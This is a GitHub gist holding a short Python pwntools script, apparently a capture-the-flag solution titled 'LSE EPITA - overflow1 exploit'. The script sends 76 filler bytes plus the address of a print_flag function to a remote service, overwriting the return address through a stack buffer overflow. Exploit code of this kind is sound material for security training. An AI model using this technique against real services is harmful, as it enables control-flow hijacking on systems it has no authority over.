Created
May 19, 2017 21:10
-
-
Save 0xPwny/6bb37373b14f091ed69e34bac0d3792c to your computer and use it in GitHub Desktop.
LSE EPITA - overflow1 exploit
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/python | |
# 72: 0804857b 128 FUNC GLOBAL DEFAULT 13 print_flag | |
from pwn import * | |
import sys | |
#con = process("./overflow") | |
con = remote(sys.argv[1],sys.argv[2]) | |
buff = "A"*76 | |
buff += p32(0x0804857b) | |
con.sendline(buff) | |
print con.recvall() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment